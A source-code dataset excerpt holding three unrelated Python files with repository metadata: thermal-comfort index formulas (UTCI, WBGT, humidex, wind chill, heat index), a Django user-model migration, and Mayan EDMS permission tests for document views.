        + -3.99428410e-03 * t2m2 * rh2
        + -9.54009191e-04 * t2m3 * rh2
        + 1.93090978e-05 * t2m4 * rh2
        + -3.08806365e-01 * va * rh2
        + 1.16952364e-02 * t2m * va * rh2
        + 4.95271903e-04 * t2m2 * va * rh2
        + -1.90710882e-05 * t2m3 * va * rh2
        + 2.10787756e-03 * va2 * rh2
        + -6.98445738e-04 * t2m * va2 * rh2
        + 2.30109073e-05 * t2m2 * va2 * rh2
        + 4.17856590e-04 * va3 * rh2
        + -1.27043871e-05 * t2m * va3 * rh2
        + -3.04620472e-06 * va4 * rh2
        + 5.14507424e-02 * e_mrt * rh2
        + -4.32510997e-03 * t2m * e_mrt * rh2
        + 8.99281156e-05 * t2m2 * e_mrt * rh2
        + -7.14663943e-07 * t2m3 * e_mrt * rh2
        + -2.66016305e-04 * va * e_mrt * rh2
        + 2.63789586e-04 * t2m * va * e_mrt * rh2
        + -7.01199003e-06 * t2m2 * va * e_mrt * rh2
        + -1.06823306e-04 * va2 * e_mrt * rh2
        + 3.61341136e-06 * t2m * va2 * e_mrt * rh2
        + 2.29748967e-07 * va3 * e_mrt * rh2
        + 3.04788893e-04 * e_mrt2 * rh2
        + -6.42070836e-05 * t2m * e_mrt2 * rh2
        + 1.16257971e-06 * t2m2 * e_mrt2 * rh2
        + 7.68023384e-06 * va * e_mrt2 * rh2
        + -5.47446896e-07 * t2m * va * e_mrt2 * rh2
        + -3.59937910e-08 * va2 * e_mrt2 * rh2
        + -4.36497725e-06 * e_mrt3 * rh2
        + 1.68737969e-07 * t2m * e_mrt3 * rh2
        + 2.67489271e-08 * va * e_mrt3 * rh2
        + 3.23926897e-09 * e_mrt4 * rh2
        + -3.53874123e-02 * rh3
        + -2.21201190e-01 * t2m * rh3
        + 1.55126038e-02 * t2m2 * rh3
        + -2.63917279e-04 * t2m3 * rh3
        + 4.53433455e-02 * va * rh3
        + -4.32943862e-03 * t2m * va * rh3
        + 1.45389826e-04 * t2m2 * va * rh3
        + 2.17508610e-04 * va2 * rh3
        + -6.66724702e-05 * t2m * va2 * rh3
        + 3.33217140e-05 * va3 * rh3
        + -2.26921615e-03 * e_mrt * rh3
        + 3.80261982e-04 * t2m * e_mrt * rh3
        + -5.45314314e-09 * t2m2 * e_mrt * rh3
        + -7.96355448e-04 * va * e_mrt * rh3
        + 2.53458034e-05 * t2m * va * e_mrt * rh3
        + -6.31223658e-06 * va2 * e_mrt * rh3
        + 3.02122035e-04 * e_mrt2 * rh3
        + -4.77403547e-06 * t2m * e_mrt2 * rh3
        + 1.73825715e-06 * va * e_mrt2 * rh3
        + -4.09087898e-07 * e_mrt3 * rh3
        + 6.14155345e-01 * rh4
        + -6.16755931e-02 * t2m * rh4
        + 1.33374846e-03 * t2m2 * rh4
        + 3.55375387e-03 * va * rh4
        + -5.13027851e-04 * t2m * va * rh4
        + 1.02449757e-04 * va2 * rh4
        + -1.48526421e-03 * e_mrt * rh4
        + -4.11469183e-05 * t2m * e_mrt * rh4
        + -6.80434415e-06 * va * e_mrt * rh4
        + -9.77675906e-06 * e_mrt2 * rh4
        + 8.82773108e-02 * rh5
        + -3.01859306e-03 * t2m * rh5
        + 1.04452989e-03 * va * rh5
        + 2.47090539e-04 * e_mrt * rh5
        + 1.48348065e-03 * rh6
    )
    # NOTE(review): the original carried commented-out masking of inputs
    # outside the polynomial's validity range (|t2m| < 70°C, 0 < va < 17,
    # rh <= 5 kPa, -30 <= e_mrt < 100). No such filtering is applied here
    # either, so values outside that range are extrapolations.
    return utci
def calculate_wbgts(t2m):
    """
    wbgts - Wet Bulb Globe Temperature Simple

    :param t2m: 2m temperature [K]
    https://link.springer.com/article/10.1007/s00484-011-0453-2
    http://www.bom.gov.au/info/thermal_stress/#approximation
    https://www.jstage.jst.go.jp/article/indhealth/50/4/50_MS1352/_pdf
    returns Wet Bulb Globe Temperature [°C]
    """
    t2m_k = __wrap(t2m)
    # vapour-pressure term derived from the saturation vapour pressure
    # NOTE(review): calculate_saturation_vapour_pressure already returns hPa,
    # so the kPa_to_hPa rescaling here looks unit-suspect — confirm upstream.
    vapour_pressure = kPa_to_hPa(calculate_saturation_vapour_pressure(t2m_k))
    t2m_c = kelvin_to_celsius(t2m_k)
    return 0.567 * t2m_c + 0.393 * vapour_pressure + 3.38
def calculate_wbt(t_c, rh):
    """
    Wet bulb temperature (Stull 2011 one-equation approximation).

    :param t_c: 2m temperature [°C]
    :param rh: relative humidity percentage [%]
    returns wet bulb temperature [°C]
    """
    temp_c = __wrap(t_c)
    rh_pc = __wrap(rh)
    # Stull (2011): Tw = T*atan(0.151977*sqrt(RH + 8.313659)) + atan(T + RH)
    #                    - atan(RH - 1.676331)
    #                    + 0.00391838*RH^1.5*atan(0.023101*RH) - 4.686035
    term_a = temp_c * np.arctan(0.151977 * np.sqrt(rh_pc + 8.313659))
    term_b = np.arctan(temp_c + rh_pc)
    term_c = np.arctan(rh_pc - 1.676331)
    term_d = 0.00391838 * (rh_pc) ** (3 / 2) * np.arctan(0.023101 * rh_pc)
    return term_a + term_b - term_c + term_d - 4.686035
def calculate_bgt(t_k, mrt, va):
    """
    Calculate globe temperature by solving the globe energy balance.

    :param t_k: 2m temperature [K]
    :param mrt: mean radiant temperature [K]
    :param va: wind speed at 10 meters [m/s]
    returns black globe temperature [°C]

    Solves the quartic Tg^4 + (f/2)*2*Tg - (f*Ta + mrt^4) = 0 in closed form
    (Ferrari-style resolvent), keeping the physically meaningful real root.
    """
    t_k = __wrap(t_k)
    mrt = __wrap(mrt)
    va = __wrap(va)
    # convective heat-transfer factor of a standard 0.15 m globe with
    # emissivity 0.98; va enters through the 0.6-power wind dependence
    f = (1.1e8 * va ** 0.6) / (0.98 * 0.15 ** 0.4)
    # quartic coefficients: Tg^4 + 2*a*Tg + b = 0
    a = f / 2
    b = -f * t_k - mrt ** 4
    # pieces of the closed-form root (resolvent cubic radicals)
    rt1 = 3 ** (1 / 3)
    rt2 = np.sqrt(3) * np.sqrt(27 * a ** 4 - 16 * b ** 3) + 9 * a ** 2
    rt3 = 2 * 2 ** (2 / 3) * b
    # clamp a to non-negative AFTER b/rt2 were formed from the raw value
    # (order matters; presumably guards the sqrt below — TODO confirm)
    a = a.clip(min=0)
    bgt_quartic = -1 / 2 * np.sqrt(
        rt3 / (rt1 * rt2 ** (1 / 3)) + (2 ** (1 / 3) * rt2 ** (1 / 3)) / 3 ** (2 / 3)
    ) + 1 / 2 * np.sqrt(
        (4 * a)
        / np.sqrt(
            rt3 / (rt1 * rt2 ** (1 / 3))
            + (2 ** (1 / 3) * rt2 ** (1 / 3)) / 3 ** (2 / 3)
        )
        - (2 ** (1 / 3) * rt2 ** (1 / 3)) / 3 ** (2 / 3)
        - rt3 / (rt1 * rt2 ** (1 / 3))
    )
    # the root is in Kelvin; convert to Celsius for the caller
    bgt_c = kelvin_to_celsius(bgt_quartic)
    return bgt_c
def calculate_wbgt(t_k, mrt, va, td):
    """
    Calculate wet bulb globe temperature.

    :param t_k: 2m temperature [K]
    :param mrt: mean radiant temperature [K]
    :param va: wind speed at 10 meters [m/s]
    :param td: dew point temperature [K]
    returns wet bulb globe temperature [°C]
    https://journals.ametsoc.org/view/journals/apme/50/11/jamc-d-11-0143.1.xml
    """
    temp_k = __wrap(t_k)
    mrt_k = __wrap(mrt)
    wind = __wrap(va)
    dewpoint_k = __wrap(td)
    globe_c = calculate_bgt(temp_k, mrt_k, wind)
    rh_pc = calculate_relative_humidity_percent(temp_k, dewpoint_k)
    temp_c = kelvin_to_celsius(temp_k)
    wet_bulb_c = calculate_wbt(temp_c, rh_pc)
    # standard WBGT weighting: 0.7 Tw + 0.2 Tg + 0.1 Ta
    return 0.7 * wet_bulb_c + 0.2 * globe_c + 0.1 * temp_c
def calculate_mrt_from_bgt(t2m, bgt, va):
    """
    Calculate mean radiant temperature from globe temperature.

    :param t2m: 2m temperature [K]
    :param bgt: globe temperature [K]
    :param va: wind speed at 10 meters [m/s]
    returns mean radiant temperature [°C] (the Kelvin result is passed
    through kelvin_to_celsius before being returned)
    """
    t2m = __wrap(t2m)
    bgt = __wrap(bgt)
    va = __wrap(va)
    # convective heat-transfer factor of the globe (same f as calculate_bgt)
    f = (1.1e8 * va ** 0.6) / (0.98 * 0.15 ** 0.4)
    bgt4 = bgt ** 4
    # invert the globe energy balance: mrt^4 = bgt^4 + f * (bgt - t2m)
    mrtc = bgt4 + f * (bgt - t2m)
    # fourth root taken as two successive square roots
    mrtc2 = np.sqrt(np.sqrt(mrtc))
    return kelvin_to_celsius(mrtc2)
def calculate_humidex(t2m, td):
    """
    humidex - heat index used by the Canadian Meteorological Service

    :param t2m: 2m temperature [K]
    :param td: dew point temperature [K]
    returns humidex [°C]
    """
    t2m = __wrap(t2m)
    td = __wrap(td)
    # vapour pressure [hPa], Masterton & Richardson (1979):
    # e = 6.11 * exp(5417.7530 * (1/273.16 - 1/Td))
    # Fix: the original used 1/t2m where the triple-point constant
    # 1/273.16 belongs.
    e = 6.11 * np.exp(5417.7530 * ((1 / 273.16) - (1 / td)))
    h = 0.5555 * (e - 10.0)
    # humidex = air temperature [°C] + humidity term
    humidex = (t2m + h) - 273.15
    return humidex
def calculate_net_effective_temperature(t2m, va, td):
    """
    NET - Normal Effective Temperature used in Hong Kong, Poland and Germany

    :param t2m: 2m temperature [K]
    :param va: wind speed at 10 meters [m/s]
    :param td: 2m dew point temperature [K]
    returns net effective temperature [°C]
    """
    rh = calculate_relative_humidity_percent(t2m, td)  # [%]
    t2m = __wrap(t2m)
    va = __wrap(va)
    rh = __wrap(rh)
    t2m = kelvin_to_celsius(t2m)
    # Hong Kong Observatory formulation:
    #   NET = 37 - (37 - T) / (0.68 - 0.0014*RH + 1/(1.76 + 1.4*v^0.75))
    #            - 0.29*T*(1 - 0.01*RH)
    # Fixes vs. original: the wind term is 1/(1.76 + 1.4*v^0.75) (not
    # 1/1.76 + 1.4*v^0.75), (37 - T) is divided by the denominator rather
    # than wrapped in one subtraction, and RH is used directly as percent
    # (the original rescaled it with kPa_to_hPa).
    denominator = 0.68 - 0.0014 * rh + 1 / (1.76 + 1.4 * va ** 0.75)
    net = 37 - (37 - t2m) / denominator - 0.29 * t2m * (1 - 0.01 * rh)
    return net
def calculate_apparent_temperature(t2m, va, rh=None):
    """
    Apparent Temperature, version without radiation (Steadman).

    :param t2m: 2m temperature [K]
    :param va: wind speed at 10 meters [m/s]
    :param rh: water vapour pressure term [hPa]; when None it is derived
        from the saturation vapour pressure at t2m
    returns apparent temperature [°C] (the sum is computed on the Kelvin
    temperature and converted with kelvin_to_celsius at the end)
    """
    if rh is None:
        rh = calculate_saturation_vapour_pressure(t2m)
    t2m = __wrap(t2m)
    va = __wrap(va)
    rh = __wrap(rh)
    # Reduce the 10 m wind with the FAO-56 logarithmic wind profile:
    # u_low = u_z * 4.87 / ln(67.8*z - 5.42) with z = 10 m.
    # Fix: the profile uses the natural log; the original called np.log10.
    va = va * 4.87 / np.log(67.8 * 10 - 5.42)
    # Steadman: AT = Ta + 0.33*e - 0.70*ws - 4.00
    at = t2m + 0.33 * rh - 0.7 * va - 4
    at = kelvin_to_celsius(at)
    return at
def calculate_wind_chill(t2m, va):
    """
    Wind Chill (JAG/TI formulation used by Environment Canada).

    :param t2m: 2m temperature [K]
    :param va: wind speed at 10 meters [m/s]
    returns wind chill [°C]
    """
    t2m = __wrap(t2m)
    va = __wrap(va)
    t2m = kelvin_to_celsius(t2m)
    # the Celsius formulation expects wind in km/h
    # (fix: the original multiplied by 2.23694, i.e. converted to mph)
    va = va * 3.6
    # WCI = 13.12 + 0.6215*T - 11.37*v^0.16 + 0.3965*T*v^0.16
    # (fix: the original had "+ 0.3965 + t2m + va**0.16", dropping the
    # products in the last term)
    windchill = 13.12 + 0.6215 * t2m - 11.37 * va ** 0.16 + 0.3965 * t2m * va ** 0.16
    return windchill
def calculate_heat_index_simplified(t2m, rh=None):
    """
    Heat Index (Rothfusz regression, Celsius form).

    :param t2m: np.array 2m temperature [K]
    :param rh: relative humidity [%]; when None a vapour-pressure proxy is
        derived from t2m (NOTE(review): that fallback path and the
        kPa_to_hPa rescaling below look unit-suspect — confirm upstream)
    returns heat index [°C]
    """
    t2m = __wrap(t2m)
    if rh is None:
        rh = calculate_saturation_vapour_pressure(t2m)
    t2m = kelvin_to_celsius(t2m)
    rh = kPa_to_hPa(rh)
    # Rothfusz regression coefficients for T in °C; each entry carries its
    # own sign. Fixes vs. original: c[0] is applied with its negative sign
    # (the original negated it again), the T^2 term (c[4]) is restored (it
    # was applied to RH^2), and the RH^2 term (c[5]) was missing entirely.
    c = [
        -8.784695,
        1.61139411,
        2.338549,
        -0.14611605,
        -1.2308094e-2,
        -1.6424828e-2,
        2.211732e-3,
        7.2546e-4,
        -3.582e-6,
    ]
    hi = (
        c[0]
        + c[1] * t2m
        + c[2] * rh
        + c[3] * t2m * rh
        + c[4] * t2m ** 2
        + c[5] * rh ** 2
        + c[6] * t2m ** 2 * rh
        + c[7] * t2m * rh ** 2
        + c[8] * t2m ** 2 * rh ** 2
    )
    return hi
def calculate_heat_index_adjusted(t2m, td):
    """
    Heat Index with the NWS low/high-humidity adjustments.

    :param t2m: np.array 2m temperature [K]
    :param td: np.array 2m dewpoint temperature [K]
    returns heat index [°C]
    https://www.wpc.ncep.noaa.gov/html/heatindex_equation.shtml
    """
    t2m = __wrap(t2m)
    td = __wrap(td)
    rh = calculate_relative_humidity_percent(t2m, td)
    t2m = kelvin_to_fahrenheit(t2m)  # the regression below is in °F
    hiarray = [
        42.379,
        2.04901523,
        10.1433312,
        0.22475541,
        0.00683783,
        0.05481717,
        0.00122874,
        0.00085282,
        0.00000199,
    ]
    hi = (
        -hiarray[0]
        + hiarray[1] * t2m
        + hiarray[2] * rh
        - hiarray[3] * t2m * rh
        - hiarray[4] * t2m ** 2
        - hiarray[5] * rh ** 2
        + hiarray[6] * t2m ** 2 * rh
        + hiarray[7] * t2m * rh ** 2
        - hiarray[8] * t2m ** 2 * rh ** 2
    )
    # NWS adjustment masks. Fix: the original combined np.where index tuples
    # with the `and` operator, which simply yields the right-hand operand,
    # so the conditions were never actually intersected.
    low_rh = np.where((t2m > 80) & (t2m < 112) & (rh <= 13))
    high_rh = np.where((t2m > 80) & (t2m < 87) & (rh > 85))
    cool = np.where(t2m < 80)
    # dry-air adjustment, subtracted: ((13 - RH)/4) * sqrt((17 - |T - 95|)/17)
    # (fix: the original used 0.95 instead of 95 and mis-placed the sqrt)
    adjustment1 = ((13 - rh[low_rh]) / 4) * np.sqrt(
        (17 - np.abs(t2m[low_rh] - 95)) / 17
    )
    # humid adjustment, added: ((RH - 85)/10) * ((87 - T)/5)
    # (fix: the original omitted the /10 and subtracted the term)
    adjustment2 = ((rh[high_rh] - 85) / 10) * ((87 - t2m[high_rh]) / 5)
    # below 80°F fall back to the simple Steadman average
    adjustment3 = 0.5 * (
        t2m[cool]
        + 61.0
        + ((t2m[cool] - 68.0) * 1.2)
        + (rh[cool] * 0.094)
    )
    hi[low_rh] = hi[low_rh] - adjustment1
    hi[high_rh] = hi[high_rh] + adjustment2
    hi[cool] = adjustment3
    hi = fahrenheit_to_celsius(hi)
    return hi
# Helpers
# convert Celsius to Kelvin
def celsius_to_kelvin(tc):
    """Convert a temperature from Celsius to Kelvin."""
    return tc + 273.15
# convert Kelvin to Celsius
def kelvin_to_celsius(tk):
    """Convert a temperature from Kelvin to Celsius."""
    return tk - 273.15
| 30.984946
| 111
| 0.549591
|
4a0a3ddec54f924d442d2226a7676fff4d8c3a5e
| 3,019
|
py
|
Python
|
young/apps/users/migrations/0001_initial.py
|
Aooyh/Young
|
223671c05085f79a9f12513ccc16abbb4ca801d4
|
[
"MIT"
] | 1
|
2019-04-20T07:54:21.000Z
|
2019-04-20T07:54:21.000Z
|
young/apps/users/migrations/0001_initial.py
|
Aooyh/Young
|
223671c05085f79a9f12513ccc16abbb4ca801d4
|
[
"MIT"
] | null | null | null |
young/apps/users/migrations/0001_initial.py
|
Aooyh/Young
|
223671c05085f79a9f12513ccc16abbb4ca801d4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-12-25 15:00
from __future__ import unicode_literals
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial migration: creates the custom ``User`` model in table ``tb_user``.

    Auto-generated by Django 1.11.11; the field definitions mirror Django's
    ``AbstractUser`` plus a ``mobile`` column. Do not hand-edit applied
    migrations — the recorded state must match the database schema.
    """
    initial = True
    dependencies = [
        ('auth', '0008_alter_user_username_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
                ('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
                ('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                # custom field added on top of the stock AbstractUser fields
                # (verbose_name is Chinese for "user mobile number")
                ('mobile', models.CharField(max_length=30, verbose_name='用户手机号')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name_plural': 'users',
                'db_table': 'tb_user',
                'verbose_name': 'user',
            },
            managers=[
                # standard manager so createsuperuser etc. keep working
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
    ]
| 62.895833
| 329
| 0.662471
|
4a0a3fed7ab0bd697149e886caf8fac5f9bd1ea2
| 16,591
|
py
|
Python
|
mayan/apps/documents/tests/test_document_views.py
|
O2Graphics/Mayan-EDMS
|
e11e6f47240f3c536764be66828dbe6428dceb41
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/documents/tests/test_document_views.py
|
O2Graphics/Mayan-EDMS
|
e11e6f47240f3c536764be66828dbe6428dceb41
|
[
"Apache-2.0"
] | 5
|
2021-03-19T22:56:45.000Z
|
2022-03-12T00:08:43.000Z
|
mayan/apps/documents/tests/test_document_views.py
|
halsten/mayan-edms
|
10372daede6e6dea0bea67eb98767e3be6fbf86f
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from django.utils.encoding import force_text
from mayan.apps.converter.layers import layer_saved_transformations
from mayan.apps.converter.permissions import permission_transformation_delete
from mayan.apps.converter.tests.mixins import LayerTestMixin
from ..models import DeletedDocument, Document, DocumentType
from ..permissions import (
permission_document_create, permission_document_download,
permission_document_print, permission_document_properties_edit,
permission_document_tools, permission_document_view,
permission_empty_trash
)
from .base import GenericDocumentViewTestCase
from .literals import (
TEST_DOCUMENT_TYPE_2_LABEL, TEST_SMALL_DOCUMENT_FILENAME
)
from .mixins import DocumentViewTestMixin
class DocumentViewTestCase(
LayerTestMixin, DocumentViewTestMixin, GenericDocumentViewTestCase
):
    # --- document properties view and document list view ---
    def test_document_view_no_permissions(self):
        # without permission the view denies with 404 (hides existence)
        response = self._request_document_properties_view()
        self.assertEqual(response.status_code, 404)
    def test_document_view_with_permissions(self):
        self.grant_access(
            obj=self.test_document, permission=permission_document_view
        )
        # with access the properties page renders and shows the label
        response = self._request_document_properties_view()
        self.assertContains(
            response=response, text=self.test_document.label, status_code=200
        )
    def test_document_list_view_no_permissions(self):
        # list renders (200) but the unauthorized document is filtered out
        response = self._request_test_document_list_view()
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.context['object_list'].count(), 0)
    def test_document_list_view_with_access(self):
        self.grant_access(
            obj=self.test_document, permission=permission_document_view
        )
        response = self._request_test_document_list_view()
        self.assertContains(
            response=response, text=self.test_document.label, status_code=200
        )
    # --- single-document type change (POST and GET variants) ---
    def test_document_document_type_change_post_view_no_permissions(self):
        self.assertEqual(
            self.test_document.document_type, self.test_document_type
        )
        document_type_2 = DocumentType.objects.create(
            label=TEST_DOCUMENT_TYPE_2_LABEL
        )
        response = self._request_test_document_type_edit_post_view(
            document_type=document_type_2
        )
        self.assertEqual(response.status_code, 404)
        # type must be unchanged after the denied request
        self.assertEqual(
            Document.objects.get(pk=self.test_document.pk).document_type,
            self.test_document_type
        )
    def test_document_document_type_change_post_view_with_permissions(self):
        self.assertEqual(
            self.test_document.document_type, self.test_document_type
        )
        document_type_2 = DocumentType.objects.create(
            label=TEST_DOCUMENT_TYPE_2_LABEL
        )
        # needs edit access on the document AND create access on the target type
        self.grant_access(
            obj=self.test_document, permission=permission_document_properties_edit
        )
        self.grant_access(
            obj=document_type_2, permission=permission_document_create
        )
        response = self._request_test_document_type_edit_post_view(
            document_type=document_type_2
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(
            Document.objects.get(pk=self.test_document.pk).document_type,
            document_type_2
        )
    def test_document_document_type_change_view_get_no_permissions(self):
        response = self._request_test_document_type_edit_get_view(
        )
        self.assertEqual(response.status_code, 404)
        self.assertEqual(
            Document.objects.get(pk=self.test_document.pk).document_type,
            self.test_document_type
        )
    def test_document_document_type_change_view_get_with_permissions(self):
        self.grant_access(
            obj=self.test_document, permission=permission_document_properties_edit
        )
        # GET only renders the form; the document type must not change
        response = self._request_test_document_type_edit_get_view(
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            Document.objects.get(pk=self.test_document.pk).document_type,
            self.test_document_type
        )
    # --- multi-select (bulk) document type change ---
    def test_document_multiple_document_type_change_view_no_permission(self):
        self.assertEqual(
            Document.objects.first().document_type, self.test_document_type
        )
        document_type_2 = DocumentType.objects.create(
            label=TEST_DOCUMENT_TYPE_2_LABEL
        )
        response = self._request_multiple_document_type_edit(
            document_type=document_type_2
        )
        self.assertEqual(response.status_code, 404)
        # bulk edit denied: type unchanged
        self.assertEqual(
            Document.objects.first().document_type, self.test_document_type
        )
    def test_document_multiple_document_type_change_view_with_permission(self):
        self.assertEqual(
            Document.objects.first().document_type, self.test_document_type
        )
        document_type_2 = DocumentType.objects.create(
            label=TEST_DOCUMENT_TYPE_2_LABEL
        )
        # same two-sided access requirement as the single-document edit
        self.grant_access(
            obj=self.test_document,
            permission=permission_document_properties_edit
        )
        self.grant_access(
            obj=document_type_2, permission=permission_document_create
        )
        response = self._request_multiple_document_type_edit(
            document_type=document_type_2
        )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(
            Document.objects.first().document_type, document_type_2
        )
    # --- document download: form, single and multiple ---
    def test_document_download_form_view_no_permission(self):
        # the form page itself renders, but the document is not listed
        response = self._request_document_download_form_view()
        self.assertNotContains(
            response=response, text=self.test_document.label, status_code=200
        )
    def test_document_download_form_view_with_access(self):
        self.grant_access(
            obj=self.test_document, permission=permission_document_download
        )
        response = self._request_document_download_form_view()
        self.assertContains(
            response=response, text=self.test_document.label, status_code=200
        )
    def test_document_download_view_no_permission(self):
        # the actual file download is denied with 403 (not 404)
        response = self._request_document_download_view()
        self.assertEqual(response.status_code, 403)
    def test_document_download_view_with_permission(self):
        # Set the expected_content_types for
        # common.tests.mixins.ContentTypeCheckMixin
        self.expected_content_types = (
            '{}; charset=utf-8'.format(
                self.test_document.file_mimetype
            ),
        )
        self.grant_access(
            obj=self.test_document, permission=permission_document_download
        )
        response = self._request_document_download_view()
        self.assertEqual(response.status_code, 200)
        # downloaded payload must match the stored file byte for byte
        with self.test_document.open() as file_object:
            self.assert_download_response(
                response=response, content=file_object.read(),
                basename=TEST_SMALL_DOCUMENT_FILENAME,
                mime_type=self.test_document.file_mimetype
            )
    def test_document_multiple_download_view_no_permission(self):
        response = self._request_document_multiple_download_view()
        self.assertEqual(response.status_code, 403)
    def test_document_multiple_download_view_with_permission(self):
        # Set the expected_content_types for
        # common.tests.mixins.ContentTypeCheckMixin
        self.expected_content_types = (
            '{}; charset=utf-8'.format(
                self.test_document.file_mimetype
            ),
        )
        self.grant_access(
            obj=self.test_document, permission=permission_document_download
        )
        response = self._request_document_multiple_download_view()
        self.assertEqual(response.status_code, 200)
        with self.test_document.open() as file_object:
            self.assert_download_response(
                response=response, content=file_object.read(),
                basename=TEST_SMALL_DOCUMENT_FILENAME,
                mime_type=self.test_document.file_mimetype
            )
    # --- document version download ---
    def test_document_version_download_view_no_permission(self):
        response = self._request_document_version_download()
        self.assertEqual(response.status_code, 403)
    def test_document_version_download_view_with_permission(self):
        # Set the expected_content_types for
        # common.tests.mixins.ContentTypeCheckMixin
        self.expected_content_types = (
            '{}; charset=utf-8'.format(
                self.test_document.latest_version.mimetype
            ),
        )
        self.grant_access(
            obj=self.test_document, permission=permission_document_download
        )
        response = self._request_document_version_download()
        self.assertEqual(response.status_code, 200)
        # default basename is the string representation of the version
        with self.test_document.open() as file_object:
            self.assert_download_response(
                response=response, content=file_object.read(),
                basename=force_text(self.test_document.latest_version),
                mime_type='{}; charset=utf-8'.format(
                    self.test_document.latest_version.mimetype
                )
            )
    def test_document_version_download_preserve_extension_view_with_permission(self):
        # Set the expected_content_types for
        # common.tests.mixins.ContentTypeCheckMixin
        self.expected_content_types = (
            '{}; charset=utf-8'.format(
                self.test_document.latest_version.mimetype
            ),
        )
        self.grant_access(
            obj=self.test_document, permission=permission_document_download
        )
        # preserve_extension keeps the original file extension in the
        # suggested download filename
        response = self._request_document_version_download(
            data={'preserve_extension': True}
        )
        self.assertEqual(response.status_code, 200)
        with self.test_document.open() as file_object:
            self.assert_download_response(
                response=response, content=file_object.read(),
                basename=self.test_document.latest_version.get_rendered_string(
                    preserve_extension=True
                ), mime_type='{}; charset=utf-8'.format(
                    self.test_document.latest_version.mimetype
                )
            )
def test_document_update_page_count_view_no_permission(self):
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
response = self._request_document_update_page_count_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(self.test_document.pages.count(), 0)
def test_document_update_page_count_view_with_permission(self):
page_count = self.test_document.pages.count()
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
self.grant_access(
obj=self.test_document, permission=permission_document_tools
)
response = self._request_document_update_page_count_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(self.test_document.pages.count(), page_count)
def test_document_multiple_update_page_count_view_no_permission(self):
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
response = self._request_document_multiple_update_page_count_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(self.test_document.pages.count(), 0)
def test_document_multiple_update_page_count_view_with_permission(self):
page_count = self.test_document.pages.count()
self.test_document.pages.all().delete()
self.assertEqual(self.test_document.pages.count(), 0)
self.grant_access(
obj=self.test_document, permission=permission_document_tools
)
response = self._request_document_multiple_update_page_count_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(self.test_document.pages.count(), page_count)
def test_document_clear_transformations_view_no_permission(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_clear_transformations_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(
transformation_count,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_document_clear_transformations_view_with_access(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document,
permission=permission_transformation_delete
)
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_clear_transformations_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(
transformation_count - 1,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_document_multiple_clear_transformations_view_no_permission(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_document_multiple_clear_transformations()
self.assertEqual(response.status_code, 404)
self.assertEqual(
transformation_count,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_document_multiple_clear_transformations_view_with_access(self):
self._create_document_transformation()
transformation_count = layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
self.grant_access(
obj=self.test_document, permission=permission_transformation_delete
)
response = self._request_document_multiple_clear_transformations()
self.assertEqual(response.status_code, 302)
self.assertEqual(
transformation_count - 1,
layer_saved_transformations.get_transformations_for(
obj=self.test_document.pages.first()
).count()
)
def test_trash_can_empty_view_no_permission(self):
    """Emptying the trash without permission must 403 and keep the
    trashed document intact."""
    self.test_document.delete()
    self.assertEqual(DeletedDocument.objects.count(), 1)
    response = self._request_empty_trash_view()
    self.assertEqual(response.status_code, 403)
    # Document must still be in the trash.
